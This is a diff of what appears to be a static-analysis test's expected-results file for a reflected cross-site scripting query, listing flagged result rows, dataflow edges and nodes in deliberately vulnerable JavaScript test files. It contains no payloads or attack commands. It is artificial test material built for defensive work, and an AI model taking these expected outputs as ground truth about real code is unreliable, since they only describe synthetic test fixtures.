@@ -1,44 +1,101 @@ +#select +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:33:12:33:18 | mytable | ReflectedXss.js:31:14:31:21 | req.body | ReflectedXss.js:33:12:33:18 | mytable | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:31:14:31:21 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | +| ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... 
rams.id | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | +| ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | +| ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | +| ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | user-provided value | +| ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | ReflectedXssGood3.js:135:15:135:27 | req.params.id | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | Cross-site scripting vulnerability due to a $@. | ReflectedXssGood3.js:135:15:135:27 | req.params.id | user-provided value | +| etherpad.js:11:12:11:19 | response | etherpad.js:9:16:9:30 | req.query.jsonp | etherpad.js:11:12:11:19 | response | Cross-site scripting vulnerability due to a $@. | etherpad.js:9:16:9:30 | req.query.jsonp | user-provided value | +| formatting.js:6:14:6:47 | util.fo ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:6:14:6:47 | util.fo ... , evil) | Cross-site scripting vulnerability due to a $@. 
| formatting.js:4:16:4:29 | req.query.evil | user-provided value | +| formatting.js:7:14:7:53 | require ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:7:14:7:53 | require ... , evil) | Cross-site scripting vulnerability due to a $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value | +| live-server.js:6:13:6:50 | ` ... /html>` | live-server.js:4:21:4:27 | req.url | live-server.js:6:13:6:50 | ` ... /html>` | Cross-site scripting vulnerability due to a $@. | live-server.js:4:21:4:27 | req.url | user-provided value | +| live-server.js:12:13:12:50 | ` ... /html>` | live-server.js:10:21:10:27 | req.url | live-server.js:12:13:12:50 | ` ... /html>` | Cross-site scripting vulnerability due to a $@. | live-server.js:10:21:10:27 | req.url | user-provided value | +| pages/Next.jsx:8:13:8:19 | req.url | pages/Next.jsx:8:13:8:19 | req.url | pages/Next.jsx:8:13:8:19 | req.url | Cross-site scripting vulnerability due to a $@. | pages/Next.jsx:8:13:8:19 | req.url | user-provided value | +| pages/Next.jsx:15:13:15:19 | req.url | pages/Next.jsx:15:13:15:19 | req.url | pages/Next.jsx:15:13:15:19 | req.url | Cross-site scripting vulnerability due to a $@. | pages/Next.jsx:15:13:15:19 | req.url | user-provided value | +| pages/api/myapi.js:2:14:2:20 | req.url | pages/api/myapi.js:2:14:2:20 | req.url | pages/api/myapi.js:2:14:2:20 | req.url | Cross-site scripting vulnerability due to a $@. | pages/api/myapi.js:2:14:2:20 | req.url | user-provided value | +| partial.js:10:14:10:18 | x + y | partial.js:13:42:13:48 | req.url | partial.js:10:14:10:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:13:42:13:48 | req.url | user-provided value | +| partial.js:19:14:19:18 | x + y | partial.js:22:51:22:57 | req.url | partial.js:19:14:19:18 | x + y | Cross-site scripting vulnerability due to a $@. 
| partial.js:22:51:22:57 | req.url | user-provided value | +| partial.js:28:14:28:18 | x + y | partial.js:31:47:31:53 | req.url | partial.js:28:14:28:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:31:47:31:53 | req.url | user-provided value | +| partial.js:37:14:37:18 | x + y | partial.js:40:43:40:49 | req.url | partial.js:37:14:37:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:40:43:40:49 | req.url | user-provided value | +| promises.js:6:25:6:25 | x | promises.js:5:44:5:57 | req.query.data | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to a $@. | promises.js:5:44:5:57 | req.query.data | user-provided value | +| tst2.js:7:12:7:12 | p | tst2.js:6:9:6:9 | p | tst2.js:7:12:7:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:6:9:6:9 | p | user-provided value | +| tst2.js:8:12:8:12 | r | tst2.js:6:12:6:15 | q: r | tst2.js:8:12:8:12 | r | Cross-site scripting vulnerability due to a $@. | tst2.js:6:12:6:15 | q: r | user-provided value | +| tst2.js:18:12:18:12 | p | tst2.js:14:9:14:9 | p | tst2.js:18:12:18:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:14:9:14:9 | p | user-provided value | +| tst2.js:21:14:21:14 | p | tst2.js:14:9:14:9 | p | tst2.js:21:14:21:14 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:14:9:14:9 | p | user-provided value | +| tst2.js:36:12:36:12 | p | tst2.js:30:9:30:9 | p | tst2.js:36:12:36:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:30:9:30:9 | p | user-provided value | +| tst2.js:37:12:37:18 | other.p | tst2.js:30:9:30:9 | p | tst2.js:37:12:37:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:30:9:30:9 | p | user-provided value | +| tst2.js:51:12:51:17 | unsafe | tst2.js:43:9:43:9 | p | tst2.js:51:12:51:17 | unsafe | Cross-site scripting vulnerability due to a $@. 
| tst2.js:43:9:43:9 | p | user-provided value | +| tst2.js:63:12:63:12 | p | tst2.js:57:9:57:9 | p | tst2.js:63:12:63:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:57:9:57:9 | p | user-provided value | +| tst2.js:64:12:64:18 | other.p | tst2.js:57:9:57:9 | p | tst2.js:64:12:64:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:57:9:57:9 | p | user-provided value | +| tst2.js:75:12:75:12 | p | tst2.js:69:9:69:9 | p | tst2.js:75:12:75:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:69:9:69:9 | p | user-provided value | +| tst2.js:76:12:76:18 | other.p | tst2.js:69:9:69:9 | p | tst2.js:76:12:76:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:69:9:69:9 | p | user-provided value | +| tst2.js:88:12:88:12 | p | tst2.js:82:9:82:9 | p | tst2.js:88:12:88:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:82:9:82:9 | p | user-provided value | +| tst2.js:89:12:89:18 | other.p | tst2.js:82:9:82:9 | p | tst2.js:89:12:89:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:82:9:82:9 | p | user-provided value | +| tst3.js:6:12:6:12 | p | tst3.js:5:9:5:9 | p | tst3.js:6:12:6:12 | p | Cross-site scripting vulnerability due to a $@. | tst3.js:5:9:5:9 | p | user-provided value | +| tst3.js:12:12:12:15 | code | tst3.js:11:32:11:39 | reg.body | tst3.js:12:12:12:15 | code | Cross-site scripting vulnerability due to a $@. | tst3.js:11:32:11:39 | reg.body | user-provided value | edges -| ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | provenance | | -| ReflectedXss.js:30:7:33:4 | mytable | ReflectedXss.js:34:12:34:18 | mytable | provenance | | -| ReflectedXss.js:30:17:33:4 | table([ ... 
y]\\n ]) | ReflectedXss.js:30:7:33:4 | mytable | provenance | | -| ReflectedXss.js:32:14:32:21 | req.body | ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | provenance | | -| ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | provenance | | -| ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:64:39:64:42 | file | provenance | | -| ReflectedXss.js:64:39:64:42 | file | ReflectedXss.js:65:16:65:19 | file | provenance | | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | ReflectedXss.js:68:12:68:52 | remark( ... tring() | provenance | | -| ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:41 | remark( ... q.body) | provenance | | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | ReflectedXss.js:72:12:72:65 | unified ... oString | provenance | | -| ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:56 | unified ... q.body) | provenance | | -| ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:74:34:74:34 | f | provenance | | -| ReflectedXss.js:74:34:74:34 | f | ReflectedXss.js:75:14:75:14 | f | provenance | | -| ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | provenance | | -| ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | provenance | | -| ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | provenance | | -| ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | provenance | | -| ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... 
q.body) | provenance | | -| ReflectedXss.js:114:11:114:41 | queryKeys | ReflectedXss.js:116:18:116:26 | queryKeys | provenance | | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:114:11:114:41 | queryKeys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:50:118:53 | keys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:58:118:61 | keys | provenance | | -| ReflectedXss.js:116:18:116:26 | queryKeys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray | ReflectedXss.js:119:25:119:32 | keyArray | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | ReflectedXss.js:119:25:119:32 | keyArray [0] | provenance | | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | ReflectedXss.js:118:11:118:61 | keyArray [0] | provenance | | -| ReflectedXss.js:118:50:118:53 | keys | ReflectedXss.js:118:49:118:54 | [keys] [0] | provenance | | -| ReflectedXss.js:118:58:118:61 | keys | ReflectedXss.js:118:11:118:61 | keyArray | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys | ReflectedXss.js:122:33:122:43 | invalidKeys | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | ReflectedXss.js:122:33:122:43 | invalidKeys [0] | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | ReflectedXss.js:119:11:119:72 | invalidKeys | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | ReflectedXss.js:119:11:119:72 | invalidKeys [0] | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys | ReflectedXss.js:122:33:122:54 | invalid ... 
n(', ') | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | provenance | | +| ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | provenance | | +| ReflectedXss.js:29:7:32:4 | mytable | ReflectedXss.js:33:12:33:18 | mytable | provenance | | +| ReflectedXss.js:29:17:32:4 | table([ ... ce\\n ]) | ReflectedXss.js:29:7:32:4 | mytable | provenance | | +| ReflectedXss.js:31:14:31:21 | req.body | ReflectedXss.js:29:17:32:4 | table([ ... ce\\n ]) | provenance | | +| ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | provenance | | +| ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:63:39:63:42 | file | provenance | | +| ReflectedXss.js:63:39:63:42 | file | ReflectedXss.js:64:16:64:19 | file | provenance | | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | ReflectedXss.js:67:12:67:52 | remark( ... tring() | provenance | | +| ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:41 | remark( ... q.body) | provenance | | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | ReflectedXss.js:71:12:71:65 | unified ... oString | provenance | | +| ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:56 | unified ... 
q.body) | provenance | | +| ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:73:34:73:34 | f | provenance | | +| ReflectedXss.js:73:34:73:34 | f | ReflectedXss.js:74:14:74:14 | f | provenance | | +| ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | provenance | | +| ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | provenance | | +| ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | provenance | | +| ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | provenance | | +| ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | provenance | | +| ReflectedXss.js:113:11:113:41 | queryKeys | ReflectedXss.js:115:18:115:26 | queryKeys | provenance | | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:113:11:113:41 | queryKeys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:50:117:53 | keys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:58:117:61 | keys | provenance | | +| ReflectedXss.js:115:18:115:26 | queryKeys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray | ReflectedXss.js:118:25:118:32 | keyArray | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | ReflectedXss.js:118:25:118:32 | keyArray [0] | provenance | | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | ReflectedXss.js:117:11:117:61 | keyArray [0] | provenance | | +| ReflectedXss.js:117:50:117:53 | keys | ReflectedXss.js:117:49:117:54 | [keys] [0] | provenance | | +| ReflectedXss.js:117:58:117:61 | keys | ReflectedXss.js:117:11:117:61 | keyArray | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys | ReflectedXss.js:121:33:121:43 | 
invalidKeys | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | ReflectedXss.js:121:33:121:43 | invalidKeys [0] | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | ReflectedXss.js:118:11:118:72 | invalidKeys | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | ReflectedXss.js:118:11:118:72 | invalidKeys [0] | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | provenance | | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | provenance | | 
@@ -147,67 +204,67 @@ edges | tst3.js:11:16:11:74 | prettie ... bel" }) | tst3.js:11:9:11:74 | code | provenance | | | tst3.js:11:32:11:39 | reg.body | tst3.js:11:16:11:74 | prettie ... bel" }) | provenance | | nodes -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:8:33:8:45 | req.params.id | semmle.label | req.params.id | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:17:31:17:39 | params.id | semmle.label | params.id | -| ReflectedXss.js:22:12:22:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | semmle.label | marked(req.body) | -| ReflectedXss.js:23:19:23:26 | req.body | semmle.label | req.body | -| ReflectedXss.js:29:12:29:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:30:7:33:4 | mytable | semmle.label | mytable | -| ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | semmle.label | table([ ... y]\\n ]) | -| ReflectedXss.js:32:14:32:21 | req.body | semmle.label | req.body | -| ReflectedXss.js:34:12:34:18 | mytable | semmle.label | mytable | -| ReflectedXss.js:41:12:41:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | semmle.label | convert ... q.body) | -| ReflectedXss.js:42:31:42:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:56:12:56:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:14:64:21 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:39:64:42 | file | semmle.label | file | -| ReflectedXss.js:65:16:65:19 | file | semmle.label | file | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | semmle.label | remark( ... tring() | -| ReflectedXss.js:68:33:68:40 | req.body | semmle.label | req.body | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | semmle.label | unified ... 
q.body) | -| ReflectedXss.js:72:12:72:65 | unified ... oString | semmle.label | unified ... oString | -| ReflectedXss.js:72:48:72:55 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:20:74:27 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:34:74:34 | f | semmle.label | f | -| ReflectedXss.js:75:14:75:14 | f | semmle.label | f | -| ReflectedXss.js:83:12:83:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | -| ReflectedXss.js:84:22:84:29 | req.body | semmle.label | req.body | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | -| ReflectedXss.js:85:23:85:30 | req.body | semmle.label | req.body | -| ReflectedXss.js:97:12:97:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:98:30:98:37 | req.body | semmle.label | req.body | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:100:31:100:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | semmle.label | markdow ... 
q.body) | -| ReflectedXss.js:103:76:103:83 | req.body | semmle.label | req.body | -| ReflectedXss.js:110:16:110:30 | request.query.p | semmle.label | request.query.p | -| ReflectedXss.js:114:11:114:41 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | semmle.label | keys: queryKeys | -| ReflectedXss.js:116:11:116:45 | keys | semmle.label | keys | -| ReflectedXss.js:116:18:116:26 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | -| ReflectedXss.js:118:11:118:61 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | semmle.label | [keys] [0] | -| ReflectedXss.js:118:50:118:53 | keys | semmle.label | keys | -| ReflectedXss.js:118:58:118:61 | keys | semmle.label | keys | -| ReflectedXss.js:119:11:119:72 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:119:25:119:32 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | -| ReflectedXss.js:122:33:122:43 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:7:33:7:45 | req.params.id | semmle.label | req.params.id | +| ReflectedXss.js:16:12:16:39 | "Unknow ... 
rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:16:31:16:39 | params.id | semmle.label | params.id | +| ReflectedXss.js:21:12:21:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | semmle.label | marked(req.body) | +| ReflectedXss.js:22:19:22:26 | req.body | semmle.label | req.body | +| ReflectedXss.js:28:12:28:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:29:7:32:4 | mytable | semmle.label | mytable | +| ReflectedXss.js:29:17:32:4 | table([ ... ce\\n ]) | semmle.label | table([ ... ce\\n ]) | +| ReflectedXss.js:31:14:31:21 | req.body | semmle.label | req.body | +| ReflectedXss.js:33:12:33:18 | mytable | semmle.label | mytable | +| ReflectedXss.js:40:12:40:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | semmle.label | convert ... q.body) | +| ReflectedXss.js:41:31:41:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:55:12:55:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:14:63:21 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:39:63:42 | file | semmle.label | file | +| ReflectedXss.js:64:16:64:19 | file | semmle.label | file | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | 